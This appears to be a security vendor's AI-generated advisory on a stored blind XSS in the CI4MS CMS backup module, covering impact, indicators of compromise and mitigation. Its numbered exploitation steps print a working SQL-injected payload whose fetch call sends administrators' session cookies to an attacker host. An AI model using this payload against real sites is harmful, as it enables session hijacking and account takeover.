CVE-2026-34563: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34563 is a stored blind cross-site scripting (Blind XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the backup management module, where user-controlled input in backup filenames is not properly sanitized before being stored and rendered in administrative views. It was published on March 31, 2026, and patched in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.9 (Critical) per the GitHub Advisory, and is classified under CWE-79 (Github Advisory, GitHub Security Advisory).

Technical details

The root cause is improper neutralization of user-controlled input (CWE-79) in the backup upload and metadata processing pipeline. An attacker crafts a malicious SQL file (xss.sql) that, when uploaded via the backup upload functionality, uses SQL statements to insert a JavaScript payload into the backup filename field server-side — bypassing any client-side validation. The stored payload is subsequently rendered without HTML entity encoding in multiple backup management views (/backend/backup/upload, /backend/backup/, /backup/{id}), using unsafe DOM manipulation methods such as .html() or innerHTML. Because the payload executes only when a privileged user views the backup panel, this constitutes a Blind XSS scenario (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation allows an authenticated attacker with backup upload privileges to execute arbitrary JavaScript in the browsers of any user — including administrators — who views the backup management panel. This enables full account takeover across all roles, privilege escalation, theft of session tokens, unauthorized administrative actions, and complete compromise of the application. The scope change (S:C) in the CVSS vector reflects that the injected script executes in the context of other users' sessions, extending the blast radius well beyond the attacker's own account (Github Advisory, GitHub Security Advisory).

Exploitability

A proof-of-concept exploit with detailed reproduction steps is publicly available in the GitHub Security Advisory, including a video PoC hosted on Mega.nz. The advisory provides concrete steps (upload xss.sql, navigate to the backup panel, trigger XSS) and a sample payload (<img src=x onerror=alert(document.domain)>), making exploitation straightforward for any attacker with low-level authenticated access. The EPSS score is approximately 0.046–0.058% (18th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (Github Advisory, GitHub Security Advisory).

Exploitation steps

  1. Reconnaissance: Identify CI4MS instances running versions ≤ 0.28.6.0 by examining HTTP response headers, page footers, or Composer metadata that may reveal the framework and version.
  2. Obtain low-privilege access: Register or obtain credentials for any account with backup upload permissions on the target CI4MS instance.
  3. Craft malicious SQL file: Create a file named xss.sql containing SQL INSERT or UPDATE statements that write a JavaScript XSS payload into the backup filename field, e.g.:
    UPDATE backups SET filename = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>' WHERE id=1;
  4. Upload the malicious backup: Navigate to /backend/backup/upload and upload xss.sql using the backup upload functionality.
  5. Wait for privileged user interaction: The stored payload persists in the database. When an administrator or privileged user navigates to /backend/backup/ or /backup/{id}, the unsanitized filename is rendered in the page, triggering the JavaScript payload in their browser.
  6. Harvest session tokens / escalate privileges: The executed payload can exfiltrate session cookies to an attacker-controlled server, enabling session hijacking, full account takeover, or further administrative actions on behalf of the victim (Github Advisory, GitHub Security Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from administrator browsers to unexpected external domains (e.g., attacker-controlled servers) originating from backup management page interactions; unusual fetch() or XMLHttpRequest calls visible in browser developer tools or proxy logs.
  • Logs: Web server access logs showing POST requests to /backend/backup/upload with .sql file uploads from non-administrative accounts; repeated access to /backend/backup/ or /backup/{id} endpoints shortly after an unusual upload event.
  • Database: Backup filename fields in the database containing HTML tags, JavaScript snippets, or encoded payloads (e.g., <img, <script, onerror=, fetch(, document.cookie) rather than standard filename strings.
  • File System: Presence of unexpected .sql files in the backup upload directory with filenames or contents containing JavaScript payloads.
  • Browser/Session: Unexplained administrative actions (user creation, permission changes, configuration edits) performed under administrator accounts without corresponding administrator-initiated activity (Github Advisory).

Mitigation and workarounds

The vendor has released a patch in CI4MS version 0.31.0.0, which implements global input validation, enhanced CSRF token handling, and XSS protection across the application. Administrators should upgrade immediately by running composer update after backing up their database, as the release includes major structural changes including CodeIgniter Shield integration. As interim mitigations, restrict backup upload functionality to only the most trusted administrative accounts, implement a strict Content Security Policy (CSP) to block inline script execution, and set HttpOnly, SameSite, and Secure flags on session cookies to limit the impact of any successful XSS exploitation (Github Advisory, Release Notes).

Community reactions

The vulnerability received coverage from The Hacker Wire, which published an article specifically on the stored blind XSS via backup filename (The Hacker Wire). Social media discussion was observed on Mastodon and Bluesky shortly after disclosure. The vulnerability was also indexed by VulDB, CVEFeed, and the EU Vulnerability Database (EUVD-2026-18075), indicating broad community awareness. No major vendor statements beyond the GitHub advisory have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management